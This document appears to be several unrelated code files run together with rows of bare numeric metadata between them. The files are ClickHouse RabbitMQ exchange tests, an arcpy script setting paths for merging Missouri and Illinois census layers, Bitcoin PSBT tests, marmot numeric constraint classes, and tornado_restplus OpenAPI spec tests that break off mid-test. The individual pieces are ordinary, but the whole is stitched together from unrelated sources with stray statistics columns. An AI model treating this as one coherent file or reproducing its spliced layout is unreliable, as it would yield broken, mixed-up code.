    # 'x-consistent-hash' exchange while ten producer threads publish with
    # random routing keys.  Each message lands in exactly one queue, so the
    # destination total must equal messages_num * threads_num.
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    num_tables = 4
    for consumer_id in range(num_tables):
        table_name = 'rabbitmq_consumer{}'.format(consumer_id)
        print("Setting up {}".format(table_name))
        instance.query('''
            DROP TABLE IF EXISTS test.{0};
            DROP TABLE IF EXISTS test.{0}_mv;
            CREATE TABLE test.{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 10,
                         rabbitmq_exchange_type = 'consistent_hash',
                         rabbitmq_exchange_name = 'hash_exchange_testing',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.{0};
        '''.format(table_name))

    # Mutable cell shared by all producer threads so the key/value sequence
    # continues across threads.
    # NOTE(review): `i[0] += 1` is not an atomic operation, so concurrent
    # producers could in principle duplicate sequence numbers; the row COUNT
    # checked below is unaffected — confirm if per-key uniqueness matters.
    i = [0]
    messages_num = 500

    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)

    def produce():
        # init connection here because otherwise python rabbitmq client might fail
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='hash_exchange_testing', exchange_type='x-consistent-hash')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        for message in messages:
            # Random routing key: the consistent-hash exchange hashes it to
            # pick exactly one bound queue.
            key = str(randrange(10))
            channel.basic_publish(exchange='hash_exchange_testing', routing_key=key, body=message)
        connection.close()

    threads = []
    threads_num = 10
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        # Stagger thread start-up to avoid hammering the broker at once.
        time.sleep(random.uniform(0, 1))
        thread.start()

    # Poll until every published message is consumed exactly once; the loop
    # only exits once producers have finished, so the drops below are safe.
    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break

    for consumer_id in range(num_tables):
        table_name = 'rabbitmq_consumer{}'.format(consumer_id)
        instance.query('''
            DROP TABLE IF EXISTS test.{0};
            DROP TABLE IF EXISTS test.{0}_mv;
        '''.format(table_name))

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
    ''')

    for thread in threads:
        thread.join()

    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_multiple_bindings(rabbitmq_cluster):
    """One table bound to a direct exchange under five routing keys.

    Two consumer tables are created — ``bindings_1`` with explicit
    ``rabbitmq_num_consumers``/``rabbitmq_num_queues`` and ``bindings_2`` with
    the defaults — because multiple bindings are implemented differently in
    the two configurations.  Ten producer threads each publish
    ``messages_num`` messages under all five keys, and both tables receive
    every message, so the expected total is
    ``messages_num * threads_num * 5 * 2``.
    """
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    instance.query('''
        DROP TABLE IF EXISTS test.bindings_1;
        DROP TABLE IF EXISTS test.bindings_1_mv;
        CREATE TABLE test.bindings_1 (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_consumers = 5,
                     rabbitmq_num_queues = 2,
                     rabbitmq_exchange_name = 'multiple_bindings_testing',
                     rabbitmq_exchange_type = 'direct',
                     rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        CREATE MATERIALIZED VIEW test.bindings_1_mv TO test.destination AS
            SELECT * FROM test.bindings_1;
    ''')

    # in case num_consumers and num_queues are not set - multiple bindings are implemented differently, so test them too
    instance.query('''
        DROP TABLE IF EXISTS test.bindings_2;
        DROP TABLE IF EXISTS test.bindings_2_mv;
        CREATE TABLE test.bindings_2 (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_exchange_name = 'multiple_bindings_testing',
                     rabbitmq_exchange_type = 'direct',
                     rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        CREATE MATERIALIZED VIEW test.bindings_2_mv TO test.destination AS
            SELECT * FROM test.bindings_2;
    ''')

    # Mutable cell shared by the producer threads (sequence continues across
    # threads; only the total row count is asserted).
    i = [0]
    messages_num = 500

    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)

    def produce():
        # init connection here because otherwise python rabbitmq client might fail
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='multiple_bindings_testing', exchange_type='direct')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        keys = ['key1', 'key2', 'key3', 'key4', 'key5']
        for key in keys:
            for message in messages:
                mes_id = str(randrange(10))
                channel.basic_publish(exchange='multiple_bindings_testing', routing_key=key,
                    properties=pika.BasicProperties(message_id=mes_id), body=message)
        connection.close()

    threads = []
    threads_num = 10
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        # Stagger thread start-up to avoid hammering the broker at once.
        time.sleep(random.uniform(0, 1))
        thread.start()

    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * threads_num * 5 * 2:
            break

    for thread in threads:
        thread.join()

    # BUG FIX: the materialized views were previously left behind (only the
    # source tables were dropped), unlike every sibling test's cleanup.
    instance.query('''
        DROP TABLE IF EXISTS test.bindings_1;
        DROP TABLE IF EXISTS test.bindings_1_mv;
        DROP TABLE IF EXISTS test.bindings_2;
        DROP TABLE IF EXISTS test.bindings_2_mv;
        DROP TABLE IF EXISTS test.destination;
    ''')

    assert int(result) == messages_num * threads_num * 5 * 2, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_headers_exchange(rabbitmq_cluster):
    """Headers-exchange routing with 'x-match=all' bindings.

    Three tables bind with headers ``format=logs, type=report, year=2020``
    and must receive every message; two more bind with ``year=2019`` and must
    receive nothing.  Expected destination total:
    ``messages_num * num_tables_to_receive``.
    """
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    num_tables_to_receive = 3
    for consumer_id in range(num_tables_to_receive):
        print("Setting up table {}".format(consumer_id))
        instance.query('''
            DROP TABLE IF EXISTS test.headers_exchange_{0};
            DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
            CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 4,
                         rabbitmq_exchange_name = 'headers_exchange_testing',
                         rabbitmq_exchange_type = 'headers',
                         rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2020',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.headers_exchange_{0};
        '''.format(consumer_id))

    # These tables bind with year=2019, which the published headers will not
    # match, so they must stay empty.
    num_tables_to_ignore = 2
    for consumer_id in range(num_tables_to_ignore):
        print("Setting up table {}".format(consumer_id + num_tables_to_receive))
        instance.query('''
            DROP TABLE IF EXISTS test.headers_exchange_{0};
            DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
            CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_exchange_name = 'headers_exchange_testing',
                         rabbitmq_exchange_type = 'headers',
                         rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2019',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.headers_exchange_{0};
        '''.format(consumer_id + num_tables_to_receive))

    messages_num = 1000

    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='headers_exchange_testing', exchange_type='headers')

    # Single-threaded publisher: comprehension replaces the original
    # mutable-cell counter; the unused key_num local is dropped.
    messages = [json.dumps({'key': i, 'value': i}) for i in range(messages_num)]

    # Headers matching only the year=2020 bindings.
    fields = {'format': 'logs', 'type': 'report', 'year': '2020'}

    for message in messages:
        mes_id = str(randrange(10))
        channel.basic_publish(exchange='headers_exchange_testing', routing_key='',
            properties=pika.BasicProperties(headers=fields, message_id=mes_id), body=message)

    connection.close()

    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * num_tables_to_receive:
            break

    # BUG FIX: the cleanup previously dropped test.direct_exchange_{0}
    # (tables belonging to a different test), leaving every
    # test.headers_exchange_* table and view behind.
    for consumer_id in range(num_tables_to_receive + num_tables_to_ignore):
        instance.query('''
            DROP TABLE IF EXISTS test.headers_exchange_{0};
            DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
        '''.format(consumer_id))

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
    ''')

    assert int(result) == messages_num * num_tables_to_receive, 'ClickHouse lost some messages: {}'.format(result)
if __name__ == '__main__':
    # Manual debugging entry point: bring the test cluster up and keep it
    # alive until the operator presses a key, then tear it down.
    cluster.start()
    # NOTE(review): raw_input exists only on Python 2; on Python 3 this line
    # raises NameError (use input() there) — confirm the intended interpreter.
    raw_input("Cluster created, press any key to destroy...")
    cluster.shutdown()
| 35.887296
| 131
| 0.619838
| 6,058
| 55,087
| 5.450149
| 0.051502
| 0.023988
| 0.025987
| 0.040161
| 0.880183
| 0.862556
| 0.854105
| 0.836236
| 0.808038
| 0.798043
| 0
| 0.022148
| 0.277906
| 55,087
| 1,534
| 132
| 35.910691
| 0.807884
| 0.006045
| 0
| 0.790438
| 0
| 0.00239
| 0.449447
| 0.082674
| 0
| 0
| 0
| 0
| 0.012749
| 1
| 0.032669
| false
| 0
| 0.011952
| 0
| 0.047012
| 0.011952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51aabc090e10a4cf306592fc043ca0ca1d10e9c1
| 599
|
py
|
Python
|
MergeCensusPolygonsMOIL.py
|
MetroSTL/TitleVI-Analysis
|
33a22b9574aa9d383e84c198dd2c8090a6f8ed5f
|
[
"MIT"
] | 1
|
2019-10-28T03:06:44.000Z
|
2019-10-28T03:06:44.000Z
|
MergeCensusPolygonsMOIL.py
|
MetroSTL/TitleVI-Analysis
|
33a22b9574aa9d383e84c198dd2c8090a6f8ed5f
|
[
"MIT"
] | 5
|
2019-10-28T15:28:33.000Z
|
2019-10-28T15:33:10.000Z
|
MergeCensusPolygonsMOIL.py
|
AvidDabbler/TitleVI-Analysis
|
bc447ead902c4c6bf4fbfbb92f4dfbb75f22b5a6
|
[
"MIT"
] | 1
|
2021-03-17T13:50:24.000Z
|
2021-03-17T13:50:24.000Z
|
"""Set up paths for merging Missouri and Illinois ACS 5-year block groups.

Configures the arcpy workspace and the input/output geodatabase paths used
by the merge workflow.
"""
import arcpy as ap
import os

# BUG FIX: os.path is a module, not a callable — the original
# ``os.path("W:\\...")`` raised TypeError at runtime.  The workspace is a
# plain path string; raw strings keep every backslash literal.
env = ap.env.workspace = r"W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB"

# Name for the merged output feature class.
final_name = "ACS_2013_5YR_BG"

# Illinois and Missouri source feature classes (feature class inside its
# state geodatabase).
il_path = os.path.join(
    r"W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\ACS_2013_5YR_BG_17.gdb\ACS_2013_5YR_BG_17_ILLINOIS.gdb",
    "ACS_2013_5YR_BG_17_ILLINOIS")
mo_path = os.path.join(
    r"W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\ACS_2013_5YR_BG_29.gdb\ACS_2013_5YR_BG_29_MISSOURI.gdb",
    "ACS_2013_5YR_BG_29_MISSOURI")

# Geodatabase that will receive the merged polygons.
outputgdb = r"W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\merge.gdb"
| 54.454545
| 174
| 0.831386
| 109
| 599
| 4.146789
| 0.275229
| 0.108407
| 0.154867
| 0.185841
| 0.80531
| 0.80531
| 0.79646
| 0.575221
| 0.575221
| 0.575221
| 0
| 0.089317
| 0.046745
| 599
| 10
| 175
| 59.9
| 0.702277
| 0
| 0
| 0
| 0
| 0.285714
| 0.729549
| 0.704508
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ee4480f3685f7b55860f93c5fe4a2b23719ad9
| 3,304
|
py
|
Python
|
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
import unittest
from src.coins.bitcoin import Bitcoin
class TestBitcoin(unittest.TestCase):
    # Unit tests for the Bitcoin coin wrapper's PSBT handling.

    def setUp(self):
        # Base64-encoded PSBTs fed directly to Bitcoin.get_transaction_info.
        # NOTE(review): these look like the well-known BIP-174 example PSBT
        # (signed and unsigned variants) — confirm against the spec.
        self.psbt_signed = b"cHNidP8BAJoCAAAAAljoeiG1ba8MI76OcHBFbDNvfLqlyHV5JPVFiHuyq911AAAAAAD/////g40EJ9DsZQpoqka7CwmK6kQiwHGyyng1Kgd5WdB86h0BAAAAAP////8CcKrwCAAAAAAWABTYXCtx0AYLCcmIauuBXlCZHdoSTQDh9QUAAAAAFgAUAK6pouXw+HaliN9VRuh0LR2HAI8AAAAAAAEAuwIAAAABqtc5MQGL0l+ErkALaISL4J23BurCrBgpi6vucatlb4sAAAAASEcwRAIgWPb8fGoz4bMVSNSByCbAFb0wE1qtQs1neQ2rZtKtJDsCIEoc7SYExnNbY5PltBaR3XiwDwxZQvufdRhW+qk4FX26Af7///8CgPD6AgAAAAAXqRQPuUY0IWlrgsgzryQceMF9295JNIfQ8gonAQAAABepFCnKdPigj4GZlCgYXJe12FLkBj9hh2UAAAAiAgKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgf0cwRAIgdAGK1BgAl7hzMjwAFXILNoTMgSOJEEjn282bVa1nnJkCIHPTabdA4+tT3O+jOCPIBwUUylWn3ZVE8VfBZ5EyYRGMAQEDBAEAAAABBEdSIQKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgfyEC2rYf9JoU22p9ArDNH7t4/EsYMStbTlTa5Nui+/71NtdSriIGApWDvzmuCmCXR60Zmt3WNPphCFWdbFzTm0whg/GrluB/ENkMak8AAACAAAAAgAAAAIAiBgLath/0mhTban0CsM0fu3j8SxgxK1tOVNrk26L7/vU21xDZDGpPAAAAgAAAAIABAACAAAEBIADC6wsAAAAAF6kUt/X69A49QKWkWbHbNTXyty+pIeiHIgIDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtxHMEQCIGLrelVhB6fHP0WsSrWh3d9vcHX7EnWWmn84Pv/3hLyyAiAMBdu3Rw2/LwhVfdNWxzJcHtMJE+mWzThAlF2xIijaXwEBAwQBAAAAAQQiACCMI1MXN0O1ld+0oHtyuo5C43l9p06H/n2ddJfjsgKJAwEFR1IhAwidwQx6xttU+RMpr2FzM9s4jOrQwjH3IzedG5kDCwLcIQI63ZBPPW3PWd25BrDe4jUpt/+57VDl6GFRkmhgIh8Oc1KuIgYCOt2QTz1tz1nduQaw3uI1Kbf/ue1Q5ehhUZJoYCIfDnMQ2QxqTwAAAIAAAACAAwAAgCIGAwidwQx6xttU+RMpr2FzM9s4jOrQwjH3IzedG5kDCwLcENkMak8AAACAAAAAgAIAAIAAIgIDqaTDf1mW06ol26xrVwrwZQOUSSlCRgs1R1Ptnuylh3EQ2QxqTwAAAIAAAACABAAAgAAiAgJ/Y5l1fS7/VaE2rQLGhLGDi2VW5fG2s0KCqUtrUAUQlhDZDGpPAAAAgAAAAIAFAACAAA=="
        self.psbt_unsigned = b"cHNidP8BAJoCAAAAAljoeiG1ba8MI76OcHBFbDNvfLqlyHV5JPVFiHuyq911AAAAAAD/////g40EJ9DsZQpoqka7CwmK6kQiwHGyyng1Kgd5WdB86h0BAAAAAP////8CcKrwCAAAAAAWABTYXCtx0AYLCcmIauuBXlCZHdoSTQDh9QUAAAAAFgAUAK6pouXw+HaliN9VRuh0LR2HAI8AAAAAAAEAuwIAAAABqtc5MQGL0l+ErkALaISL4J23BurCrBgpi6vucatlb4sAAAAASEcwRAIgWPb8fGoz4bMVSNSByCbAFb0wE1qtQs1neQ2rZtKtJDsCIEoc7SYExnNbY5PltBaR3XiwDwxZQvufdRhW+qk4FX26Af7///8CgPD6AgAAAAAXqRQPuUY0IWlrgsgzryQceMF9295JNIfQ8gonAQAAABepFCnKdPigj4GZlCgYXJe12FLkBj9hh2UAAAABAwQBAAAAAQRHUiEClYO/Oa4KYJdHrRma3dY0+mEIVZ1sXNObTCGD8auW4H8hAtq2H/SaFNtqfQKwzR+7ePxLGDErW05U2uTbovv+9TbXUq4iBgKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgfxDZDGpPAAAAgAAAAIAAAACAIgYC2rYf9JoU22p9ArDNH7t4/EsYMStbTlTa5Nui+/71NtcQ2QxqTwAAAIAAAACAAQAAgAABASAAwusLAAAAABepFLf1+vQOPUClpFmx2zU18rcvqSHohwEDBAEAAAABBCIAIIwjUxc3Q7WV37Sge3K6jkLjeX2nTof+fZ10l+OyAokDAQVHUiEDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtwhAjrdkE89bc9Z3bkGsN7iNSm3/7ntUOXoYVGSaGAiHw5zUq4iBgI63ZBPPW3PWd25BrDe4jUpt/+57VDl6GFRkmhgIh8OcxDZDGpPAAAAgAAAAIADAACAIgYDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtwQ2QxqTwAAAIAAAACAAgAAgAAiAgOppMN/WZbTqiXbrGtXCvBlA5RJKUJGCzVHU+2e7KWHcRDZDGpPAAAAgAAAAIAEAACAACICAn9jmXV9Lv9VoTatAsaEsYOLZVbl8bazQoKpS2tQBRCWENkMak8AAACAAAAAgAUAAIAA"
        self.bit = Bitcoin()

    def test_sign_transction(self):
        # TODO: signing is not covered yet.  The typo in the method name
        # ('transction') is kept so the test id stays stable.
        pass

    def test_display_transaction_amount(self):
        # The decoded transaction summary must state the spent amount.
        text: str = self.bit.get_transaction_info(self.psbt_unsigned)
        self.assertIn("1.4999 btc", text)

    def test_display_transaction_addr(self):
        # ...and the destination bech32 address.
        text: str = self.bit.get_transaction_info(self.psbt_unsigned)
        self.assertIn("bc1qmpwzkuwsqc9snjvgdt4czhjsnywa5yjdgwyw6k", text)
| 157.333333
| 1,522
| 0.923729
| 123
| 3,304
| 24.682927
| 0.617886
| 0.01054
| 0.01581
| 0.121212
| 0.28195
| 0.28195
| 0.28195
| 0.042161
| 0.042161
| 0.042161
| 0
| 0.114465
| 0.03753
| 3,304
| 20
| 1,523
| 165.2
| 0.840252
| 0
| 0
| 0.133333
| 0
| 0.133333
| 0.831719
| 0.828692
| 0
| 1
| 0
| 0
| 0.133333
| 1
| 0.266667
| false
| 0.066667
| 0.133333
| 0
| 0.466667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
51f46755b03e054fb6b2b49004c54f04bdb86738
| 2,885
|
py
|
Python
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | 2
|
2020-11-12T16:33:08.000Z
|
2020-11-13T21:21:36.000Z
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | 2
|
2020-12-07T20:27:53.000Z
|
2020-12-07T20:28:44.000Z
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | null | null | null |
"""Core functionality for marmot process modeling."""
__author__ = "Jake Nunemaker"
__copyright__ = "Copyright 2020, Jake Nunemaker"
__email__ = "jake.d.nunemaker@gmail.com"
__status__ = "Development"
class Constraint:
    """Base class for constraint callables used in marmot process models."""

    pass


class gt(Constraint):
    """Strictly-greater-than constraint: satisfied where ``arr > val``."""

    def __init__(self, val):
        """
        Parameters
        ----------
        val : int | float
            Numeric threshold.

        Raises
        ------
        TypeError
            If `val` is not numeric (bool is rejected explicitly because it
            is an int subclass).
        """
        if isinstance(val, (int, float)) and not isinstance(val, bool):
            self.val = val
        else:
            # No placeholders — plain string (the original used a stray f-prefix).
            raise TypeError("Constraint 'gt' requires a numeric input.")

    def __call__(self, arr):
        """
        Returns boolean array where `arr` > `val`.

        Parameters
        ----------
        arr : array-like
        """
        return arr > self.val

    def __repr__(self):
        return f" > {self.val}"


class ge(Constraint):
    """Greater-than-or-equal constraint: satisfied where ``arr >= val``."""

    def __init__(self, val):
        """
        Parameters
        ----------
        val : int | float
            Numeric threshold.

        Raises
        ------
        TypeError
            If `val` is not numeric (bool is rejected explicitly).
        """
        if isinstance(val, (int, float)) and not isinstance(val, bool):
            self.val = val
        else:
            raise TypeError("Constraint 'ge' requires a numeric input.")

    def __call__(self, arr):
        """
        Returns boolean array where `arr` >= `val`.

        Parameters
        ----------
        arr : array-like
        """
        return arr >= self.val

    def __repr__(self):
        return f" >= {self.val}"


class lt(Constraint):
    """Strictly-less-than constraint: satisfied where ``arr < val``."""

    def __init__(self, val):
        """
        Parameters
        ----------
        val : int | float
            Numeric threshold.

        Raises
        ------
        TypeError
            If `val` is not numeric (bool is rejected explicitly).
        """
        if isinstance(val, (int, float)) and not isinstance(val, bool):
            self.val = val
        else:
            raise TypeError("Constraint 'lt' requires a numeric input.")

    def __call__(self, arr):
        """
        Returns boolean array where `arr` < `val`.

        Parameters
        ----------
        arr : array-like
        """
        return arr < self.val

    def __repr__(self):
        return f" < {self.val}"


class le(Constraint):
    """Less-than-or-equal constraint: satisfied where ``arr <= val``."""

    def __init__(self, val):
        """
        Parameters
        ----------
        val : int | float
            Numeric threshold.

        Raises
        ------
        TypeError
            If `val` is not numeric (bool is rejected explicitly).
        """
        if isinstance(val, (int, float)) and not isinstance(val, bool):
            self.val = val
        else:
            raise TypeError("Constraint 'le' requires a numeric input.")

    def __call__(self, arr):
        """
        Returns boolean array where `arr` <= `val`.

        Parameters
        ----------
        arr : array-like
        """
        return arr <= self.val

    def __repr__(self):
        return f" <= {self.val}"


class false(Constraint):
    """Falsiness constraint: satisfied where the element is falsy."""

    def __init__(self):
        pass

    def __call__(self, arr):
        """
        Returns boolean array where `array` is `False`.

        Parameters
        ----------
        arr : array-like
            Must support ``.astype`` (e.g. a NumPy array).
        """
        return ~arr.astype(bool)

    def __repr__(self):
        # Constant text — the original carried a stray f-prefix.
        return " is False"


class true(Constraint):
    """Truthiness constraint: satisfied where the element is truthy."""

    def __init__(self):
        pass

    def __call__(self, arr):
        """
        Returns boolean array where `array` is `True`.

        Parameters
        ----------
        arr : array-like
            Must support ``.astype`` (e.g. a NumPy array).
        """
        return arr.astype(bool)

    def __repr__(self):
        return " is True"
| 19.10596
| 73
| 0.529983
| 311
| 2,885
| 4.633441
| 0.18328
| 0.077724
| 0.070784
| 0.087439
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0
| 0.002098
| 0.338995
| 2,885
| 150
| 74
| 19.233333
| 0.75354
| 0.192721
| 0
| 0.55
| 0
| 0
| 0.154826
| 0.012739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.05
| 0
| 0.1
| 0.616667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
cfb44eca3eb9173dc118cf3f0581646e985d0f6d
| 6,354
|
py
|
Python
|
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | 1
|
2019-05-11T09:21:50.000Z
|
2019-05-11T09:21:50.000Z
|
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | null | null | null |
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | null | null | null |
from tornado.web import Application
from unittest import TestCase
from tornado_restplus import Api
from tests.common import BaseEchoHandler
from marshmallow import Schema, fields
class SpecTest(TestCase):
    # Exercises OpenAPI spec generation in tornado_restplus: documented
    # routes, opting out via _doc=False, and marshmallow schema definitions
    # registered on a namespace, on the Api, and on a lazily-added namespace.
    # NOTE: the YAML blocks inside the handlers' docstrings are parsed at
    # runtime to build the spec — they are behavior, not documentation.

    def setUp(self):
        # Fresh Application/Api pair per test, with one namespace mounted
        # under '/api'.
        super(SpecTest, self).setUp()
        self.app = Application()
        self.api = Api(self.app, title='Api title')
        self.ns = self.api.namespace('api')

    def test_route_spec(self):
        # Routes registered with _doc=True must appear in doc['paths'].
        @self.ns.route('/path', _doc=True)
        class SomeHandler(BaseEchoHandler):
            def get():
                '''Get a greeting endpoint.
                ---
                description: Get a greeting
                responses:
                    200:
                        description: A greeting to the client
                '''
                pass

            def post():
                pass

        @self.ns.route('/another_path', _doc=True)
        class AnotherHandler(BaseEchoHandler):
            def get():
                '''Get a greeting endpoint.
                ---
                description: Get a greeting from another handler
                responses:
                    200:
                        description: A greeting to the client from another
                                     handler
                '''
                pass

        doc = self.api.spec.to_dict()
        assert doc['info']['title'] == 'Api title'
        assert '/api/path' in doc['paths']
        assert doc['paths']['/api/path']['get']['description'] == \
            'Get a greeting'
        assert '/api/another_path' in doc['paths']
        assert doc['paths']['/api/another_path']['get']['description'] == \
            'Get a greeting from another handler'

    def test_route_without_spec(self):
        # _doc=False must keep the route out of the generated spec even
        # though the handler carries a YAML docstring.
        @self.ns.route('/path', _doc=False)
        class SomeHandler(BaseEchoHandler):
            def get():
                '''Get a greeting endpoint.
                ---
                description: Get a greeting
                responses:
                    200:
                        description: A greeting to the client
                '''
                pass

            def post():
                pass

        doc = self.api.spec.to_dict()
        assert doc['info']['title'] == 'Api title'
        assert '/api/path' not in doc['paths']

    def test_schema_definition_in_registered_namespace(self):
        # Definitions registered on a namespace that is already attached to
        # the Api must show up in doc['definitions'].
        class CategorySchema(Schema):
            id = fields.Int()
            name = fields.Str(required=True)

        class PetSchema(Schema):
            category = fields.Nested(CategorySchema, many=True)
            name = fields.Str()

        @self.ns.route('/path', _doc=True)
        class SomeHandler(BaseEchoHandler):
            def get(self):
                '''Get a greeting endpoint.
                ---
                description: Get a greeting
                responses:
                    200:
                        description: A greeting to the client
                        schema: PetSchema
                '''
                pass

            def post(self):
                pass

        self.ns.definition('Category', schema=CategorySchema)
        self.ns.definition('Pet', schema=PetSchema)

        doc = self.api.spec.to_dict()
        assert len(doc['definitions']) == 2
        assert 'Category' in doc['definitions']
        assert 'name' in doc['definitions']['Category']['properties']
        assert 'id' in doc['definitions']['Category']['properties']
        assert 'Pet' in doc['definitions']
